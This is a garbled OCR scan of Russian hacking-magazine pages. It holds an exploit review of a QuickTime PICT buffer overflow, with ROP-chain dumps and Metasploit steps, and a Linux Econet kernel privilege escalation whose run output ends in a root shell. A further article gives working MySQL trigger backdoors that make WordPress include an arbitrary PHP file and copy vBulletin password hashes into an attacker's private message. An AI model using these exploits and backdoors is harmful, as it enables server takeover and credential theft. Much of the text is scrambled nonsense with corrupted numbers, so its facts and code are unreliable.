
nn

if

0:оо г

'>nn

/

0.00 n n.

_1 14:30:50

~

gs

_1 14:31 :00

касательно

(

Color

g

~

IChannel

0D escriplion

ITaq SineWave 0-10 0-6

~С2

~с3 ~С4

~ Q2

IUnils

.... Zero to Т en Counter Zero to Six Counter

---

@)

---

....

---

For Help, press F1 О д хотя равным образом з насчёт для возлюбленный интер недовольство й не без; а ScadaPro

RewriteCond %{HTTP:Range} bytes;e-. * [NC] Rewrit eRule .? http://%{SERVER_NAМE} / [R;Зe2,L]

вес потом используется на качестве аргумента на функции, которая копирует материал с файла на магазин . В результате прои от ­

ходит захлестывание яички сверху стеке, которое позволяет осуще­ Но паче вс его, натурально же, подновиться перед версии

Apache 0.2.20.

ствить создавание произвольнаго заключение во контексте тек у щего пользователя.

0

Apple QuickTime PICT PnSize Buffer Overflow

РIСТ -файл начинается заголовком во

байт, вслед которыми

012

от сало доллар т изображение. В этом файле содержатся структуры данны х

CVSSV2

0.3

0111 01 011 01 011 0111

011

QuickDгaw/Color QuickDraw. QuiсkDгаw-изображение со держит заголовок фиксированной длины, ради которыми следуют документация

переменнаго размера, описывающие изображение.

[AV:N/AC:M/AU:N/C :C/I:C/A:C] I]IШ Дата релиза:

0 августа 0011

picSize : picFrame :

годы

INTEGER; RECT;

Автор: МС, corelancOdЗr По сле сих полей располагается переменное состав дан ­

CVE: CVE-2011-0257

ных, со д ержа суп х оп коды. П осле дние описывают команды ри со­

QuickTime-

проприетарная методика компании

действие н ная сызнова во

0991

Apple,

раз­

го д у д ля вос п роизведения цифрового видео,

вания равным образом дружка метры, которые влияют бери паркет учае мое лик . 1-м оп кодом во любом изображении приходится шествовать оп адрес версии, из-за

звука, текста, а н имации, музыки да панорамных изображений на

которым вместе с ледует вер эта изображения . 0-й опкод представляет

различных форматах .

с лица 0-байтный оп адрес версии [О х 0011] . Далее следуют 0-байтная

QuickTime Player

на свою очередь- зто бес­

оплачиваемый мультимедийный плеер, каковой инициативно используется

вариация изображения [Ox02ffi.

к просмотра множества различных типов файлов, в томище числе файлы

Заголовок изображения [фиксированный размер во 00 байт]:

видео , аудио, изображений, графики равным образом фильмов виртуальной реаль­

ности [VR]. $ее11

lj:4Q!•]ij Описываемая чувствительность существ условная единица т во обработке оп заключение

$e2FF PnSize

РIСТ-файла. Обработчик преобразует 06-битное беззнаковое

$есее

04

байта

WORD WORD woRD

{опкод верси и}

{версия изображения} {зарезервированный опкод заголовка} {зарезервировано}

важность на 02-битное значительность со наслышан . Это скопированное

052

ХАК Е Р

01/154/2011


ОБЗОР ЭКСПЛОИТОВ

07202С60 67202С61 67202С68

-

07202С69

07202С6С 67202С60

07202С6Е

07202С7С 67202С70 67202С7Е

07202C7F

07202С80 67202С81

07202С85 67202С8В 67202С8С 67202С92

07202С93

> 08 > 088С24

0F 0FBFC6

00000000

07202С75

0804001

0С90328С

Qu ickT_1.67202C75 n t d 01 • 0С90328С

00000000 0013B4FC

0013804С

00

00000000 00000000

ззсс ЕВ 078671FF

01С4 О0е40000

EIP

се

С е Р 0

сз

се се

R е Z е S 0

се

03

085С24 08 8883 02000000 56 8083 В20000е0 57

Т е

в отношении

нu•' ~н ~ , uw•onu

0

07202С78

Qu ickT_1. 072e2C78 ES 0023 02Ьi t 0( FFFFFFFFJ CS 0018 02Ьit 0CFFFFFFFFJ SS 0023 02Ьi t 0( FFFFFFFF J OS е023 02Ьi t ее FFFFFFFFJ FS 0еЭ8 02Ьi t 0FFOOe00( FFFJ GS ее00 NULL

О 0 LastErr ERROR...SUCCESS ( 00e000e0J EFL eseee2e6 CNO,N8,NE,R,NS,PE,GE,GJ ST0 емрtу 0. 09е7058365694897е00е-311 SТ! емрtу 0. 0322735276719957000е+171 ST2 емрt у -860. 05098630785942000

PTR OS: CE8X+82J

ЗЗFF

SТЗ емрtу ST4 емрtу

0.6214153169254062000е - 015

SТ7 емрtу

0. 0519775166695107000е - 012

-1. 0946211199493547000е+173 ST5 eropty -6. 0056473384187693000е+038 ST6 емрtу 0. 05е0000000072760000

0013850С

00138510 00138514 00138518 0013851С

00138520 00138524 00138528 0013852С

00138530 00138534 00138538 0013853С

00138540 00138544 00138548 0013854С

00138550 00138554 00138558 0013855С

00138560 00138564 00138568

0013856С е0138570

00138574 00138578 0013857С

00138580

06С78001 67Е88573

07208003 00000001

о. касательно о 6783ЕЕ02 еюГ9 о~- о 67Е21084 Д~т9 00000040 что касается

00001000

RETURN to Qu ickT_8 . 0783EE02

froм

Qu ickT_8. 07842R80

Qu ickT_O . 07Е21084

0762R008 Dabg Qu ickT_J. 0762R008 66R78005 ~R зf Qu ickT_1. 06R78005 685R9802 eWZh Qu ickT_4.685R9802 90909090 рррр ~~§~~~~~ ~-~~ Qu ickT_9.682F0001 FFF8E805 ~ w• 4949FFFF 11 49494949 0111 49494949 0111 565R5149 IQZU 30335854 т хз0 41345856 VX4R 33413050 P0R3 41304848 HH0R 42413030 00RB 54424141 RR8T 32514141 RRQ2 42324241 RB28 42423042 0088 41385058 XPSR 494R4R43 CJJI

Передача управления бери RОР-цепочку на обработчике исключения

Данные определяющие карточка lп еременного размера]:

ства бросьте п ерезаписана нашим значением Ox13BDF8, так автор попадем прямиком сверху текущий адрес. Именно из него да начнет свое проведение

RОР-цепочка, отвечающая после осмотр DEP равным образом передачу управления получи и распишись

{команда рисова н ия}

opcode data . opcode data •

WORD WORD

{командg_ рисования}

$00FF

WORD

{о п шифр ко н ца изображе н ия}

полезную нагрузку.

Трасса исполнения RОР-цепочки:

Выдержка изо таблицы опкодов:

$0006

SpExtra

space extra (fixed poiпt)

$00Ю

PпSize

реп size (poiпt)

0 4

$0008

РпМоdе

реп mode (word)

0

07202(75

ADD ESP, 0D0

07202С7В

RETN

07Е21084

РОР

07Е21085

RETN

ЕСХ

08994002 68994004

MOV EAX,DWORD PTR DS:[ECX] RETN

0696СА36

0696СА37

XCHG EAX,ESI RETN

06(78001 66(78002

RETN

07208003 67208004

RETN

------

Среди перечисленных на данн ой таблиц е оп кодов содержится и опкод PпSize, во обработке которого кроется ошибка, приводящая к уязвимос ти.

Код,

испускающий учет в

0691CCD8 6691CCDA

стека

JB SHORT QuickT_1.6691CD04 REP MOVS DWORD PTR ES: [EDI], DWORD PTR DS > JMP DWORD PTR DS:[EDX* 0+6691CDF4]

РОР

РОР

0783ЕЕ02

РОР

078ЗЕЕ0З

RETN

По сле п акт ов выполнения стих во edi окажется значение, приво­

07Е21084

РОР

дящее ко access violat ioп. Но что-то около во вкусе SЕН-цепочка во хо дескать э того безум-

07Е21085

RETN

0691CCDC

ХАКЕР

01/154/2011

ЕВР

ЕВХ

EDX

ЕСХ

053


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

РОР

б762дее9

RETN

085А9882

РОР

085А9883

RETN PUSHAD RETN RETN

б82Feeel бВ2Fееы ббд7вее5

msf exploit(apple_quicktime_pnsize) > set CMD calc.exe CMD=> calc.exe msf exploit(apple_quicktime_pnsize) > show options Module options (e xploit / windows / fileform at / apple_quick time_pnsize): Name Current Setting Required Description

EDI

ыыдеев

ЕАХ

FILENAME

Д альше n ры г аем н а н ачал что касается n по части л езной н а г рузки, р аспол агаю щ ейс мы

msf . mov

The

в соответствии с

Payload options (windows / exec): Name Current Setting Required

Ые

name .

Description

н а со т еке !уже имею щ ем ф л а г ис п по отношению л нен равным образом я):

0813853( 88138548 88138544 88138548

CMD • calc.exe • yes • The command string to execute EXITFUNC • process• yes• Exit technique: seh, thread, process, nопе

CALL ESP

07Е88573

08989898

~~~~

Е8598ЗЕ8

л Ул

FFFBE885 4949FFFF

ишя

Exploit target: Id Name

яяП

е

И н а п ос л е д ок соз дадим на а р иа ц ию касательно nи со ыв ае м об г по части зкс nл ои т а с к л асси ч еской п олезной бери г р узкой во на равно д е следовать п ускающе г ос ваш покорнейший слуга для аль куля­ т ора на

metasploit:

03Е2 03 83F9 08 72 0R F3:R5 FF2495 ~ 90

0691CCF0 6691CCF3 6691CCF5 6691CCFC 6691СО03 6691С004 6691С008 6691СО0С 6691СО10 6691СО14 6691СО18

0691C01R

0691СО1С 6691СО1Е 6691СО21 6691СО24 6691СО27

0691C02R 6691СО20 6691СО30 6691СО33 6691СО36 6691СО38

0691C03R 6691СО41 6691СО44 6691СО46 6691СО48

0691C04R 6691С040

> 0 ВС7

BR 03000000 83Е9 04 72 0С 83Е0 03 03С8

> > .

FF2485 FF2480 90 FF2480 90

~ ~ ~

08СО9166 44СО9166 68СО91бб

> 0301

0R06 8807 8R46 01 8847 01 8R46 02 С1Е9 02 8847 02 83С6 03 83С7 03 • 03F9 08 ,л72 СС

ХР SРЗ

with DEP bypass

exploit(apple_quicktime_pnsize) > exploit

[ * ] Generated output file / home / lalala / .msf4/ data / ex-

ploits / msf.mov

msf > use exploit/ windows / fileformat / apple_quicktime_pns ize msf exploit(apple_quicktime_pnsize) > set payload windows /exec payload=> windows / exec

0691ССЕ6 6691ССЕВ 6691ССЕЕ

msf

Windows

F3:R5 FF2495 ~ 8049 00 > 0301 8R06 8807 8R46 01 С1Е9 02 7 01

if.);Jdjfi Ap ple Qui ckTime

Р lауег

0.60.92. 0

~1·1!1iji•BI Су щ ест во ую т обновл е ния , усик тр а няющи е д а нн у ю у автор этих строк з вимость

RNO

ЕОХ, 0 СМР ЕСХ, 0

SHORT QuickT_1.6691C004 REP MOVS OWORO PTR ES:CEOIJ , OWORO PTR OS:CESIJ OWORO PTR OS:CEOX•4+6691COF4J NOP MOV ERX,EOI MOV ЕОХ, 0 SUB ЕСХ, 0 SHORT Qu ickT_1. 0691CCFC RNO ERX, 0 ROO ECX,ERX OWORO PTR OS:CERX•4+6691C008J Jr OWORO PTR OS:CECX•4+6691CE04J NOP 1 OWORO PTR OS:CECX•4+6691C088J 08 00 00 QuickT_1.6691C018 00 QuickT_1.6691C044 00 QuickT_1.6691C068 RNO ЕОХ,ЕСХ MOV RL, BYTE PTR OS:CESIJ MOV ВУТЕ PTR OS:CEOIJ ,RL MOV RL, BYTE PTR OS:[ESI+1J MOV ВУТЕ PTR OS:CEOI+1J ,RL MOV RL, BYTE PTR OS:CESI+2] SHR ЕСХ, 0 MOV ВУТЕ PTR OS:CEOI+2J ,RL ROO ESI, 0 ROO EOI, 0 J

Switch

t аЫе

(1-based) used a t

SEH chain of main tbread SE hand Ler QuickT_1.67202C75 4R434C46 *** CORRUPT ENTRY 001ЗВОF8

***

СМР ЕСХ, 0

SHORT QuickT_1.6691C004 REP MOVS OWORO PTR ES:[EOIJ , OWORO PTR OS:CESIJ Jt OWORO PTR OS:CEOX•4+6691COF4J LER ECX,OWORO PTR OS:CECXJ RNO ЕОХ,ЕСХ MOV RL, BYTE PTR OS:CESIJ MOV ВУТЕ PTR OS:CEOIJ ,RL MOV RL, BYTE PTR OS:CESI+1] SHR ЕСХ, 0 ВУТЕ PTR OS:[EOI+1J ,RL J

SЕН-цепочка перезаписана нашим обработчиком

051,

ХАКЕР

01/154/2011


ОБЗОР ЭКСПЛОИТОВ

Linux Kernel < 0.6.36.2 Econet Privilege Escalation Exploit

'

лучать nотенциально важную информацию с стекавой nамяти ядра.

CVSSV2 1111 01111 011 01 01111

0.2 111 0 [AV: L/АС: Н / AU : N/C : С/1 :С/А : С)

r!ШШ

Дата релиза: Автор:

Jon

0 сентября 0011 CVE: CVE-2010-4073

Obeгheide,

lj:JQ!•Jii Экnлоит интересен тем, что такое? во своей реализации исnользует моментально три

уязвимости со конечной целью nоднятия nривилегий получи и распишись локальной машине. Гл авной уязвимостью является обуревание стека ядра, а не nереnолнение титьки нате от теке , аюшки? оnисывается на соответств ую ­ щем

CVE.

Приведем оnисания уnомянутых исnользуемых СVЕ-шек:

[ii:OЧ•"•fl:й:l Переnолн ение титьки получай стеке на функции

гающейся во

net/econet/af_econet.c

econet скофигурирован,

во ядрах

econet_sendmsg, расnола­ Linu x < 0.6.36.2. Когда приветствие

локальные nоль зовате ли имеют вероятность

nовысить nривилегии, nредоставляя большое количество iоvес-структур.

lj9Jфil•fl:fial Функция

ec_dev_ioctl

во

net/econet/af_econet.c

во ядрах

Linux

<

0.6.36.2

никак не требует наличия САР_N ET_ADMIN, аюшки? дает выполнимость локаль­

Пример исnользования эксnлоита:

$ gcc 07787.с -о expl -lrt $ ./expl [+] looking for symbols ... [+] resolved symbol commit_creds to exffffffff81088ade [+] resolved symbol prepare_kernel_cred to exffffffff81088ebe [+] resolved symbol ia32_sysret to exffffffff81046692 [+] spawning children to achieve adjacent kstacks .. . [+] found parent kstack at exffffвseelcбcaeee [+] found adjacent children kstacks at exffff88eeedleaeee and exffffвseeedleceee [+] lower child spawning а helper ... [+] lower child calling compat_sys_wait4 оп helper ... [+] helper going to sleep ... [+] upper child trtggering stack overfiow ... [+] helper woke up [+] lower child returned from compat_sys_wait4 [+] parent's restart_Ыock has been clobbered [+] escalating privileges ... [+] launching root shell! # id uid;e(root) gid;e(root)

ным nользователям окружать встроенные ограниче ния достуnа и конфигурировать адреса

econet

после iосtl-вызов

SIOCSIFADDR.

it.);ldjfi Linux Kernel

lii:OФII•IФWCI Подсистема

ipc

во ядрах

Li nux <

0.6.37-гс1 невыгодный инициализирует некото­

рые структуры, что такое? дает способ локальным nользователям вдоволь

(game}land

<

0.6.36.2

,_i,J!Iiii•J:I Существуют обновления, устра няющи е данную уязвимос ть. :Х:


РгОхог

[php.m4sq10gmail .co m, rdot.org/ forum )

Бэкдор ~ПРОТРОЯНИВАНИЕ MYSQL С ПОМОЩЬЮ ХРАНИМЫХ ФУНКЦИИ,ПРОЦЕДУР И ТРИГГЕРОВ ХРАНИМЫЕ ПРОЦЕДУРЫ И ТРИГГЕРЫ • ЫЦу/рuд2КI ­ исходники ядовитой UDF-функции чтобы

MySQL4. • ЫЦу/гh[SуМ ­

MySQL 0 появилось

небольшую толику

существенных нововведений:

функций да триггеров. Они успешно позволяют выпить чашу

получи и распишись сторону БД некоторую доля

разных языках программирования . Хранимые процедуры имеет важное значение

исходников.

помогают повысить в должности производительность работы приложения. Они компилиру­

автоотключение файрвала Аррдгmог.

важный список ограничений на

• blt.ly/4cvanW -

nроцедур.

• bjt.Jy/cT657 -

равным образом на паче интересных целях­ протроянивании базы данных.

056

ются- равно позтому исполняется быстрее интерпретируемого SQL-зaпpoca. При их использовании кардинально снижается формат пересылаемой

посредь сервером равным образом клиентом информации. Правда, нужно учитывать, что нагрузка нате СУБД близ зто м неуклонно увеличивается . Оно равным образом понятно: нате

стороне клиента lприложения) выполняется меньшая порцион работы, а сверху

узел равным образом начин

стороне сервера- большая. Помимо самотеком самих хранимых

.работы не без;

процедур превалирующая СУБД поддерживают их разновидность- триг­

nосвященная триггерам.

определенных событий, например, рядом выполнении операций

MySQL Ргоху • bjt.ly/o2PfjD -тема на форуме RDot,

геры . Они безотчетно выполняются присутствие наступлении на базе данных

INSERT, UPDATE да DELETE. Сегодня я посмотрим, что-нибудь проэксплуатировать их допускается неграмотный

только лишь интересах напрямую реализации функцианала приложения , же

самым экстремально упрощая бизнес­

внутренние резервы дозволительно воспользоваться

крата одни равным образом те но поступки от БД, а нетрудно призывать соответствующую

UDF-функции с

выполняемых действий, тем

логику приложения. Но сии но

Таким образом, клиентские приложения могут безвыгодный продавать какой есть

хранимую процедуру. Причем приложения могут взяться написаны аж получай

триггеров равно хранимых

поддержкахранимыхпроцеду~

SQL-

инструкций, каковой компилируется одиночный однова да хранится сверху серве р е.

показ компиляции

• bjt.ly/гn025q ­

В

Что представляют собою хранимые процедуры? Это пакет

да на того, дай тебе следить проникновения во СУБД равным образом с хвоста неза­ На нашем диске

тьr сможешь найти nодробное обучающее видео ко во всех отношениях описанным

во статье примерам использования триггеров.

метно замонтировать на базу данных бэкдор.

НЕОБХОДИМОСТЬЛОГИРОВАНИЯ Во эпоха проведения аудита скриптов И Б-специалисты на основном

обращают уважение в ведь , во вкусе хоть куда фильтруется пользовательский ввод, а данным с БД они по большей части доверяют.

ХАКЕР

01 / 054/ 0011


Бэкдор на БД

Trigger - [mytпgger on

taьte1]-

[test on MERLIN:5149] DD.Ь. 0

Dependenges

Object

c__j~§t:Q~::м:~~8.~:iN::~R mytrigger on tаЫеМ

rаые

~ame

mytrigger

Definer

tester@%

Туре

General

t;}

On event Q мer

@ Before

~ Refresh

@ lnsert

Q Update

Q Delete

Q.efinition

Compile

BEGIП

0

'~• Debug Trigger ...

EXISTS ( SELECT * FROМ ' taЬlel ' SET NEW . f2=1 ; ELSE SET NEW . f2 ( SELECT lo!AX ( f2 ) FROМ ЕПD IF ; IF

0 3

Print

0

~ Show SQL help

0

~ Restore default size

0

<l

пена

)

ТНЕП

' taЬlel ' )

+ 0;

ЕПD

0

~

)

0:

Создание нового триггера на

tаЫе1

ll 0nsert

01

01 Highlighting

01 Unicode (L

EMS SOL Manageг

Учитывая сие положение , нужно либо самому тщательно либо основать замаскированный машина легирования, каковой запишет

'user_pass' VARCHAR( 04 ) NOT NULL , 'timestamp' TIMESTAMP NOT NULL , PRIMARY КЕУ ( 'id' )

всегда поведение злоумышленника на случае несанкционированного

);

усваивать используемый софт получай объект различного рода атак,

доступа во базу данных равно тем самым даст реальность оператив-

же равно без запинки пофиксить обнаруженную дырку. Легирование играет огромное ценность во вкусе для этапе разработки приложения, где-то и на этапе его поддержки. При этом самостоятельно сервер

MySQL

малограмотный дает воз­

Таблица wplog достаточно рости на базе test, а основа блага во нашем случае обозначена в духе woгdpгess. Сам триггер склифосовский обладать экой вид:

можности гибкой настройки легирования запросов для БД . Выход материализовать его самому, быть помощи триггеров.

Предположим, что такое? пират получил очевидный ход на базу попу­ лярного благоеого отметка WoгdPгess. Первое, зачем захочет сделать злоумышленник,- сие почти что безусловно калейдоскоп хэш а админского пассворда.

Данное манипуляция позволит бестревожно пробиться на админку и, при удачном стечении обстоятельств, насадить личный шифр на плагины, если они, конечно, доступны интересах редактирования. Ведь расшифровка хэш а админа- мастерство малоприятное, что-то около в качестве кого

WP использует до­

CREATE TRIGGER 'wp_log' BEFORE UPDATE ON 'wordpress' . 'wp_users' FOR ЕАСН ROW BEGIN IF NEW.user_pass!='$P$B9v9rCvKUXneМDBnlvCa074EtBG77hM' THEN SET INSERT INTO 'test' . 'wplog' SET 'user'=USER(), 'user_pass'=@pass; END IF; END;

статочно криптастойкий алгорифм с целью хэширования, таким образом,

пережор хорэ шествовать здорово медленно. Предлагаю известить триггер, что хорэ доглядывать после состояни­

Из заключение триггера видно, аюшки? спирт следит из-за таблицей wp _ useгs и, ежели некто редактирует эту таблицу, меняя обыкновенный

ем хэша и, на случае его изменения, внесет во дополнительную таблицу

х эш админа, во таблицу wplog будут занесены причина об этом

период изменения, фамилия пользователя, тот или другой менял хэш, равным образом так значе ­

изменении. Преимущества такого легирования понятны. Мы

ние, для которое хэш меняли.

следим исключительно из-за такими там и сям во базе, которые представля-

Сначала создадим таблицу, на которую будем вносить лог. Здесь

полуют про нас беспокойство , равно около этом ловим невыгодный постоянно запросы, а исключительно

очевидно, аюшки? свой триггер бросьте пользоваться путь на эту таблицу, а поль­

потенциально опасные, как бы бы сии требования ни были сделаны ,

зователь, который-нибудь прописан на конфиге вордпресса, доступа для данной

напрямую с базы или — или вследствие какие-либо рhр-скрипты . Также , даже если

таблице совмещать безвыгодный хорошенького понемножку да инда безграмотный бросьте додумываться что до самом ее

наш брат по чести распределили власть интересах пользователей сервер а

существовании:

MySQL, в таком случае

злоумышленник, прочитавший конфиг вордпресса да

таким образом попавший на базу, коврижки малограмотный сможет определить, сколько

CREATE TABLE 'wplog' 'id' INT NOT NULL AUTO_INCREMENT , 'user' VARCHAR( 08 ) NOT NULL ,

ХАКЕР

01 /154/2 01 0

из-за его действиями тщательно следят. Наличие данного триггера не учитывает оный вариант, эпизодически хаккер добавляет нового админа в благ. Правда , инкорпорация админа во вордпрессе- сие куда как

057


взламывание

ТРОЯНИМ

БЕЗОПАСНОСТЬ

WORDPRESS

Теперь рассмотрим кой-какие способы хакерекого применения

VBULLETIN 0

триггеров рядом установке различных бэкдоров . Для простоты по­ нимания на наших исследованиях наша сестра будем эксплуатнуть порядком

анахронический WoгdPгess версии За годы своего существования

vBulletin 0 заслужил реnутацию

а наткнемся во таблице

аспидски компетентно написанного форумного движка. Несмотря держи в таком случае

0.5.1. Заглянув на его базу, автор сразу wp _options бери некие пути ко локальным

файлам:

аюшки? спирт является nлатным продуктом, разведочный требование «Poweгed

Ьу

vBulletin >> на Google выдает сильнее 0 миллиардов совпадений, а

act i ve_p l ugi ns

a: l :{i: e ;s: 09 : "akismet/akismet . php" ;}

наличность выявленных ба го на I Ьit.ly/ovMKX1 )- итого пару десятков на версию. Тем безграмотный менее, равно у сего оживка убирать приманка интересные ба г равным образом , для

Как сделано отмечалось больше , бери такие места нужно перевертывать

одному с которых допускается отнести обнаружение данных с конфига близ

чуткость на первую очередь, а во данном случае -тем более, в такой мере в качестве кого

отправке умышленно сформированного поискового запроса. Более

после этого указаны пути ко плагинам. Ясно, в чем дело? с помощью аддонов про­

до мелочей об этомбагеты сможешь подчитать по мнению ссылке Ьit.ly/dBгtaA .

исходит расколачивание функцианала блога, в таком случае кушать файлы плагинов ин­

Также советую тебе убедить заинтересованность бери последние SОL-инъекции

клудятся на центр тяжести сердечник движка. Несложно понять, что такое? происходит

движка, их изображение не возбраняется обнаружить нате известном сайте

сие во сценарии ./wp-settings.php. В WP версии 0.5.1 инклуд плагинов

exploit-db.com .

происходит следующим образом :

i f ( get_option( 'active_plugins' ) { $curreпt_p l ugins=get_option( 'active_plugins' ); i f ( is_array($current_plugins) ) { foreach ($current_plugins as $plugin)

больше сложная операция, нежели напластование пароля у существующего, так в духе необ х одимо занести соответствующие изменения снова равно во

таблицу wp _ useгmeta. Конечно, присутствие серьезном подходе ко вопросу логирования нежелательных запросов во базе данных следует грамотно ее рассмотреть равным образом сорвать покровы те ячейки, редакти­ рование которых может повергнуть ко серьезным последствиям, а

{

дальше сделать попытку либо поправить это, либо назначить из-за такими

i f ( '' !=$plugin && file_exists( ABSPATH.PLUGINDIR . '}' .$plugin)) include_once (ABSPATH.PLUGINDIR. '/' .$pl ugin);

ячейками наблюдение. Также хочу передать совет, чтоб около анализе базы данных твоя милость на первую черед обращал почтение возьми те ячейки, в которых присутствую т пути для файлам другими словами обрывки РНР-кода.

Размышляя в отношении логировании запросов, никак не могу отнюдь не восстановить в памяти и о этакий замечательной разработке, равно как

}

MySQL Ргоху. Обычно эту

программу применяют близ masteг-slave репликации, аюшки? дает воз­ Исходя изо поверхностного анализа сего кода, становит-

можность кристально с целью клиента проксировать требования нескольких

slave & master серверов. MySQL Ргоху равным образом может логировать самочки

ся ясно, ась? никакого особого контроля подле инклуде плагинов

запросы, а дальше подвергать обработке их. Возмож н ости сего прокси дозволяется

разработчики далеко не предусмотрели. Тем самым тогда автор можем из

достаточно усиленно расклешить вместе с через сценариев в языке

легкостью вмазать ход ко любому стороннему файлу. В nосле­

lua, который

предоставит реальность выполнения команд операционной систе­

дующих версиях вордпресса 02.8 равно выше) сие сейчас было исправлено

автор не без; через отсылки прокси-запросов от

порядком добавления различных проверок, отнюдь не дающих обманывать

MySQL

клиента. Подроб­

нее об этом позволительно процитировать здесь: Ьit.ly/rcxQxl .

? Show : Sor1

Page number: В

~

nодключение посторонних файлов. Однако наш брат рассматриваем

>

>>

row(s) stat1ing from row #

Ьу key: 0 None

!so

0 in 0 horizontal

v

0mode

and repeat headers after

Ю cells

v

+ Options +-Т-+

opti011_id

Ыog_id

optio11_11aщe

optio11_val11e

a11toload

по части

Edit

lnline Edit ~с Сору О Oelete

01

насчёт

permalink_stru cture

по части

Edit

lnline Edit ~с Сору О Oelete

02

насчёт

gzipcompression

что до

yes

D

Edit

lnline Edit ~с Сору О Oelete

03

об

hack_file

насчёт

yes

об

Edit

lnline Edit ~с Сору О Oelete

04

по отношению Ыog_charset

UTF-8

yes

об

Edit

lnline Edit ~с Сору О Delete

05

касательно

moderation_ke ys

касательно

lnline Edit ~с Сору

Delete

06

в отношении

active_plugins

а : 0:{i:O; s: 09: "akismet/akismet.php";}

yes

об

lnline Edit ~с Сору О Delete

07

по отношению

home

http://localhost/wp32

yes

Мес ведь инк луда п лагинов на базе бла г а в

058

yes

no

WordPress

ХАКЕР

01/154/20 01


Бэкдор на БД

TRIGGER_NAME EVENT_MANIPULATION

EVENT_OBJECТ_CATALOG

EVENT_OBJECТ_SCHEMA EVENT_OBJECТ_TABLE ACТION_STATEMENT

vb_pluggin

INSERT

def

wp271

post

BEGIN IF NEW.pagetext ='mynewtestdata' Т Н ...

vb_users

UPDATE

def

wp271

post

BEGIN IF NEW.pagetext ='getadminsdata' ТН ...

up_pluggin

INSERT

def

wp32

wp_comments

BEGIN IF NEW.comment_content =wpadminadd ...

wp_log

UPDATE

def

wp32

wp_users

BEGIN IF NEW.user_pass 1='$P$89119rCvKUXn...

Так не грех проюрдонить созданные триггеры

версию

0.5.1

равным образом тотально можем обратиться таким << умелым >> ко­

дом, написав особенный триггер, инклудящий упомянутый нами

~ -.I!Ш./Ф@jф• i:iт

обложка присутствие добавлении комментария нате благ из секретным одним словом

<<w paddplugin >>:

MySQL

Prox~ .· .· ..···· .. .. .... .. ....... .... .· J·· . ·. . ·.

CREATE TRIGGER 'up_pluggin' BEFORE INSERT ON 'wordpress' . 'wp_comments' FOR ЕАСН ROW BEGIN IF NEW.comment_content='wpaddplugin' THEN UPDATE 'wordpress' . 'wp_options' SET 'option_value'='a:l:{i:e;s:17: " .. / .. / .. /e/hi.php";}' WHERE 'wp_options' . 'option_id'=36 ; END IF; END; Вместо пути << ..1. ./. ./e/ hi.php >> вдобавок дозволительно выделить конец для лагам веб-сервера, кабы они доступны на чтения средствами

php, другими словами

п у ть впредь до картинки, во ЕХIF-поле которой внедрен рhр-код. Вариантов может фигурировать масса. Другие упражнения триггеров пользу кого вордпресса ты с можешь приискать для форуме гdot.oгg .

ТРИГГЕР ДЛЯ VBULLEТIN

..-•--D

Результатом всевозможных манипуляций со базой данных может быть не всего только исполнение произвольнога заключение нате сервере, да опять же да

коллекция

Client

результатов

MySQL Server (не используется)

находка конфиденциальной информации юзеров, что такое? является сильной угрозой пользу кого безопа из ности приложения. Для примера давай рассмотрим нераздельно с вариантов скрытого получения данных пользо­

Картинка, поясняющая действие системных команд от через

MySQL Proxy

вателей форума

vBulletin 0.

Предположим, ась? у нас вкушать аккаунт для форуме равным образом наша сестра можем

отсылать/получать приватные сообщения, а как и учреждать и редактировать посты. Для получения испарения логин:хэш ты да я напишем триггер, что во случае редактирования поста от определенным

ДОСТУП ЕСТЬ. ЧТО ДАЛЬШЕ?

содержанием хорош изменять рядом из ланное нам личное оповещение с темой

Тут встает правильный вопрос: зачем но может сделать злоумышленник за получения прямого доступа ко

MySQL?

Если

у него снедать предпочтение

FILE, в таком случае дьявол в полном смысле слова сможет потушить шелл 777 со через всем известной конструкции «SELECТ ... INTO OUTFILE ... » .Но привилегия FILE присутствует поодаль неграмотный всегда. Зачастую доступна лишь в доступную наруже директорию со полномочия ми

допустимость редактирования ячеек определенных таблиц, которая, тем никак не менее, дает прекрасную реальность с целью проникновения

<< aj4x >> вставляя на него эмпирика изо таблицы useг:

CREATE TRIGGER 'vb_users' BEFORE UPDATE ON 'vb' . 'post' FOR ЕАСН ROW BEGIN IF NEW.pagetext 'getadmindata' THEN SET SET @data=(SELECT concat(username, ': ' ,password, ': ' ,salt) FROM user WHERE username=@my_user);

сверху сервер вместе с через изменения хэша пароля админа либо — либо инклуда

злонамеренны х файлов вследствие БД !многие CMS берут пути ко плагинам, темам не так — не то языкам напрямую изо базы!.

ХАКЕР

01 / 054/2 011

UPDATE 'vb' . 'pmtext' SET 'message' WHERE 'pmtext' . 'title'='aj4x' ; END IF; END;

@data

059


хакинг

КРАТКИЙ ЛИКБЕЗ ПО ХРАНИМЫМ ПРОЦЕДУРАМ И ТРИГГЕРАМ Есть двум ситуации, когда-когда хранимые nроцедуры

следующих оnераторов: INSERT, LOAD DATA

безграмотный н на любом случае , а ежели во AFТER, ведь всего-навсего во

могут прийтись особенно nолезными:

либо REPLACE .

случае заnроса, активизирующего триггер.

0.

0.

Существует нескольких клиентских

Событие UPDATE означает, почто во таблице

nриложений, наnисанных для различных

изменяется некоторая из трока , ведь глотать

языках да обязанных выnолнять под масть

исnользуется оnератор UPDATE.

оnерации со базами данных;

Событие

Необходимо обесnечить доnолнительную

во таблице, аюшки? может бытийствовать реали з овано вместе с

безоnасность nриложения [nользователи

nомощью оnераторов DELETE равно REPLACE.

0. tгiggeг _event- одно изо следующих событий: INSERT, UPDATE, DELETE. 4. tЫ_ name- отчество таблицы, для которой nрикреnлен

DELETE реализует ликвидация строк

триггер .

0. tгiggeг _body-SQL-onepaтopы, которые будут выnолнены nри срабатывании триггера.

малограмотный nолучают неnосредственный достуn к таблицам базы данных равным образом могут выnолнять

токмо конкретные хранимые nроцедуры).

При работе из триггерами равным образом хранимыми

Следует учитывать, зачем инстру кции DROP TABLE равным образом TRUNCATE отно из ительно таблицы

nроцедурами да малограмотный овчинка выделки стоит размыкивать по отношению

невыгодный активизируют триггер , nотом у ась? они безвыгодный

кончено большом сnиске ограничений [nолный

Хранимые nроцедуры nоявились во версии

исnользуют DELETE. С nомощью триггеров дозволительно

сnисок таких ограничений ищи no ссылке на

MySQL 0.0.2. Помимо сего СУБД стала

провести в жизнь nроверку нераздельно не без; ти данных ,

сносках) .

nоддерживать извод хранимых

логирование, а тоже установку скрытых бэкдоров

При создании хранимых nроцедур нужно

nроцедур- триггеры, которые непроизвольно

во веб-nриложениях . Для создания триггера на

исследовать следующие моменты:

вызываются nри настуnлении на базе данных событий INSERT, UPDATE равным образом DELETE. Для

